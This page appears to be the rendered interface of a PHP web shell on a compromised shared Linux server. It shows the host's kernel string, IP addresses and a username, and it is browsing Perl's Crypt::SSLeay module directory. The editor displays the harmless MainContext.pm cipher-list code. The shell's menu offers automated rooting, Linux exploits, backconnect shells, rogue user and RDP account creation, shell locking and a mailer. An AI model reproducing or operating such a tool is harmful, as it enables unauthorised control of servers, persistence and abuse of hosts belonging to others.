Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
x86_64-linux-gnu /
perl5 /
5.34 /
Crypt /
SSLeay /
[ HOME SHELL ]
Name
Size
Permission
Action
CTX.pm
66
B
-rw-r--r--
Conn.pm
67
B
-rw-r--r--
Err.pm
66
B
-rw-r--r--
MainContext.pm
1.04
KB
-rw-r--r--
Version.pm
2.27
KB
-rw-r--r--
X509.pm
553
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : MainContext.pm
package Crypt::SSLeay::MainContext; # maintains a single instance of the Crypt::SSLeay::CTX class use strict; use Carp (); use Exporter qw ( import ); use vars qw( @EXPORT @EXPORT_OK ); @EXPORT = (); @EXPORT_OK = qw( main_ctx ); require Crypt::SSLeay::CTX; # The following list is taken, with appreciation, from # Ristic, I (2013) "OpenSSL Cookbook", Feisty Duck Ltd # http://amzn.to/1z8rDdj # use constant CRYPT_SSLEAY_DEFAULT_CIPHER_LIST => join( q{:}, qw( kEECDH+ECDSA kEECDH kEDH HIGH +SHA +RC4 RC4 !aNULL !eNULL !LOW !3DES !MD5 !EXP !DSS !PSK !SRP !kECDH !CAMELLIA ) ); sub main_ctx { my $ctx = Crypt::SSLeay::CTX->new( $ENV{CRYPT_SSLEAY_ALLOW_SSLv3} ? 1 : 0 ); if ($ENV{CRYPT_SSLEAY_CIPHER}) { $ctx->set_cipher_list($ENV{CRYPT_SSLEAY_CIPHER}); } else { $ctx->set_cipher_list( CRYPT_SSLEAY_DEFAULT_CIPHER_LIST ); } $ctx; } 1;
Close